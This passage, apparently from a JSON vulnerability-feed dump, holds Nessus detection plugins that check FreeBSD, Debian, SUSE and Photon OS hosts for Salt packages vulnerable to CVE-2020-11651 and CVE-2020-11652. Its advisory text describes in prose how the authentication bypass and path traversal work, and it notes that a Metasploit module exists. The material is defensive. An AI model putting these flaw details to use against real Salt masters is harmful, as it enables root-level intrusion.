FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY,\n# OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT\n# OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR\n# BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,\n# WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE\n# OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS DOCUMENTATION,\n# EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136687);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/12\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n\n script_name(english:\"FreeBSD : salt -- multiple vulnerabilities in salt-master process (6bf55af9-973b-11ea-9f2c-38d547003487)\");\n script_summary(english:\"Checks for updated packages in pkg_info output\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\n\"The remote FreeBSD host is missing one or more security-related\nupdates.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"F-Secure reports : CVE-2020-11651 - Authentication bypass\nvulnerabilities The ClearFuncs class processes unauthenticated\nrequests and unintentionally exposes the _send_pub() method, which can\nbe used to queue messages directly on the master publish server. Such\nmessages can be used to trigger minions to run arbitrary commands as\nroot.\n\nThe ClearFuncs class also exposes the method _prep_auth_info(), which\nreturns the 'root key' used to authenticate commands from the local\nroot user on the master server. This 'root key' can then be used to\nremotely call administrative commands on the master server. This\nunintentional exposure provides a remote un-authenticated attacker\nwith root-equivalent access to the salt master.\n\nCVE-2020-11652 - Directory traversal vulnerabilities The wheel module\ncontains commands used to read and write files under specific\ndirectory paths. The inputs to these functions are concatenated with\nthe target directory and the resulting path is not canonicalized,\nleading to an escape of the intended path restriction.\n\nThe get_token() method of the salt.tokens.localfs class (which is\nexposed to unauthenticated requests by the ClearFuncs class) fails to\nsanitize the token input parameter which is then used as a filename,\nallowing insertion of '..' path elements and thus reading of files\noutside of the intended directory. The only restriction is that the\nfile has to be deserializable by salt.payload.Serial.loads().\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://docs.saltstack.com/en/latest/topics/releases/2019.2.4.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://labs.f-secure.com/advisories/saltstack-authorization-bypass\"\n );\n # https://blog.f-secure.com/new-vulnerabilities-make-exposed-salt-hosts-easy-targets/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?f051ee1b\"\n );\n # https://www.tenable.com/blog/cve-2020-11651-cve-2020-11652-critical-salt-framework-vulnerabilities-exploited-in-the-wild\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?4975c617\"\n );\n # https://vuxml.freebsd.org/freebsd/6bf55af9-973b-11ea-9f2c-38d547003487.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?d05a29b3\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py27-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py32-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py33-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py34-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py35-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py36-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py37-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:freebsd:freebsd:py38-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:freebsd:freebsd\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"FreeBSD Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/FreeBSD/release\", \"Host/FreeBSD/pkg_info\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"freebsd_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/FreeBSD/release\")) audit(AUDIT_OS_NOT, \"FreeBSD\");\nif (!get_kb_item(\"Host/FreeBSD/pkg_info\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\n\nif (pkg_test(save_report:TRUE, pkg:\"py27-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py27-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py32-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py32-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py33-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py33-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py34-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py34-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py35-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py35-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py36-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py37-salt>=3000<3000.2\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt<2019.2.4\")) flag++;\nif (pkg_test(save_report:TRUE, pkg:\"py38-salt>=3000<3000.2\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:pkg_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-13T01:47:22", "description": "Several vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate\nmethod calls. This allows a remote user to access some methods without\nauthentication. These methods can be used to retrieve user tokens from\nthe salt master and/or run arbitrary commands on salt minions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some methods\nthat improperly sanitize paths. These methods allow arbitrary\ndirectory access to authenticated users.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.", "edition": 8, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-06-01T00:00:00", "title": "Debian DLA-2223-1 : salt security update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-06-01T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:salt-syndic", "p-cpe:/a:debian:debian_linux:salt-master", "p-cpe:/a:debian:debian_linux:salt-common", "cpe:/o:debian:debian_linux:8.0", "p-cpe:/a:debian:debian_linux:salt-cloud", "p-cpe:/a:debian:debian_linux:salt-ssh", "p-cpe:/a:debian:debian_linux:salt-minion", "p-cpe:/a:debian:debian_linux:salt-doc"], "id": "DEBIAN_DLA-2223.NASL", "href": "https://www.tenable.com/plugins/nessus/136979", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Debian Security Advisory DLA-2223-1. The text\n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136979);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/12\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n\n script_name(english:\"Debian DLA-2223-1 : salt security update\");\n script_summary(english:\"Checks dpkg output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote Debian host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"Several vulnerabilities were discovered in package salt, a\nconfiguration management and infrastructure automation software.\n\nCVE-2020-11651\n\nThe salt-master process ClearFuncs class does not properly validate\nmethod calls. This allows a remote user to access some methods without\nauthentication. These methods can be used to retrieve user tokens from\nthe salt master and/or run arbitrary commands on salt minions.\n\nCVE-2020-11652\n\nThe salt-master process ClearFuncs class allows access to some methods\nthat improperly sanitize paths. These methods allow arbitrary\ndirectory access to authenticated users.\n\nFor Debian 8 'Jessie', these problems have been fixed in version\n2014.1.13+ds-3+deb8u1.\n\nWe recommend that you upgrade your salt packages.\n\nNOTE: Tenable Network Security has extracted the preceding description\nblock directly from the DLA security advisory. Tenable has attempted\nto automatically clean and format it as much as possible without\nintroducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.debian.org/debian-lts-announce/2020/05/msg00027.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/jessie/salt\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Upgrade the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:8.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/06/01\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"8.0\", prefix:\"salt-cloud\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-common\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-doc\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-master\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-minion\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-ssh\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\nif (deb_check(release:\"8.0\", prefix:\"salt-syndic\", reference:\"2014.1.13+ds-3+deb8u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-13T07:13:33", "description": "This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 6, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-04-30T00:00:00", "title": "SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-04-30T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:salt-cloud", "p-cpe:/a:novell:suse_linux:salt-ssh", "p-cpe:/a:novell:suse_linux:salt-proxy", "cpe:/o:novell:suse_linux:15", "p-cpe:/a:novell:suse_linux:python2-salt", "p-cpe:/a:novell:suse_linux:salt", "p-cpe:/a:novell:suse_linux:salt-master", "p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration", "p-cpe:/a:novell:suse_linux:salt-doc", "p-cpe:/a:novell:suse_linux:python3-salt", "p-cpe:/a:novell:suse_linux:salt-syndic", "p-cpe:/a:novell:suse_linux:salt-minion", "p-cpe:/a:novell:suse_linux:salt-api"], "id": "SUSE_SU-2020-1151-1.NASL", "href": "https://www.tenable.com/plugins/nessus/136170", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from SUSE update advisory SUSE-SU-2020:1151-1.\n# The text itself is copyright (C) SUSE.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(136170);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/12\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n\n script_name(english:\"SUSE SLES15 Security Update : salt (SUSE-SU-2020:1151-1)\");\n script_summary(english:\"Checks rpm output for the updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SUSE host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for salt fixes the following issues :\n\nFix CVE-2020-11651 and CVE-2020-11652 (bsc#1170595)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the SUSE security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.suse.com/show_bug.cgi?id=1170595\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11651/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.suse.com/security/cve/CVE-2020-11652/\"\n );\n # https://www.suse.com/support/update/announcement/2020/suse-su-20201151-1/\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6df3c979\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"To install this SUSE Security Update use the SUSE recommended\ninstallation methods like YaST online_update or 'zypper patch'.\n\nAlternatively you can run the command listed for your product :\n\nSUSE Linux Enterprise Server for SAP 15 :\n\nzypper in -t patch SUSE-SLE-Product-SLES_SAP-15-2020-1151=1\n\nSUSE Linux Enterprise Server 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-SLES-15-2020-1151=1\n\nSUSE Linux Enterprise High Performance Computing 15-LTSS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1151=1\n\nSUSE Linux Enterprise High Performance Computing 15-ESPOS :\n\nzypper in -t patch SUSE-SLE-Product-HPC-15-2020-1151=1\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python2-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:python3-salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-cloud\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-master\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-minion\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-proxy\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-ssh\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-standalone-formulas-configuration\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:salt-syndic\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:15\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/04/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"SUSE\");\nos_ver = pregmatch(pattern: \"^(SLE(S|D)\\d+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"SUSE\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(SLES15)$\", string:os_ver)) audit(AUDIT_OS_NOT, \"SUSE SLES15\", \"SUSE \" + os_ver);\n\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SUSE \" + os_ver, cpu);\nif (cpu >!< \"s390x\") audit(AUDIT_ARCH_NOT, \"s390x\", cpu);\n\n\nsp = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(sp)) sp = \"0\";\nif (os_ver == \"SLES15\" && (! preg(pattern:\"^(0)$\", string:sp))) audit(AUDIT_OS_NOT, \"SLES15 SP0\", os_ver + \" SP\" + sp);\n\n\nflag = 0;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python2-salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"python3-salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-api-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-cloud-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-doc-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-master-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-minion-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-proxy-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-ssh-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-standalone-formulas-configuration-2019.2.0-5.67.1\")) flag++;\nif (rpm_check(release:\"SLES15\", sp:\"0\", cpu:\"s390x\", reference:\"salt-syndic-2019.2.0-5.67.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"salt\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-03-13T01:13:06", "description": "An update of the salt3 package has been released.", "edition": 4, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2020-05-18T00:00:00", "title": "Photon OS 3.0: Salt3 PHSA-2020-3.0-0091", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2020-11652", "CVE-2020-11651"], "modified": "2020-05-18T00:00:00", "cpe": ["p-cpe:/a:vmware:photonos:salt3", "cpe:/o:vmware:photonos:3.0"], "id": "PHOTONOS_PHSA-2020-3_0-0091_SALT3.NASL", "href": "https://www.tenable.com/plugins/nessus/136699", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\n\n# The descriptive text and package checks in this plugin were\n# extracted from VMware Security Advisory PHSA-2020-3.0-0091. The text\n# itself is copyright (C) VMware, Inc.\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(136699);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/12\");\n\n script_cve_id(\"CVE-2020-11651\", \"CVE-2020-11652\");\n script_xref(name:\"IAVA\", value:\"2020-A-0195-S\");\n\n script_name(english:\"Photon OS 3.0: Salt3 PHSA-2020-3.0-0091\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote PhotonOS host is missing multiple security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"An update of the salt3 package has been released.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://github.com/vmware/photon/wiki/Security-Updates-3.0-91.md\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Linux packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-11651\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'SaltStack Salt Master/Minion Unauthenticated RCE');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/04/30\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:vmware:photonos:salt3\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:vmware:photonos:3.0\");\n script_set_attribute(attribute:\"stig_severity\", value:\"II\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"PhotonOS Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/PhotonOS/release\", \"Host/PhotonOS/rpm-list\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/PhotonOS/release\");\nif (isnull(release) || release !~ \"^VMware Photon\") audit(AUDIT_OS_NOT, \"PhotonOS\");\nif (release !~ \"^VMware Photon (?:Linux|OS) 3\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"PhotonOS 3.0\");\n\nif (!get_kb_item(\"Host/PhotonOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif 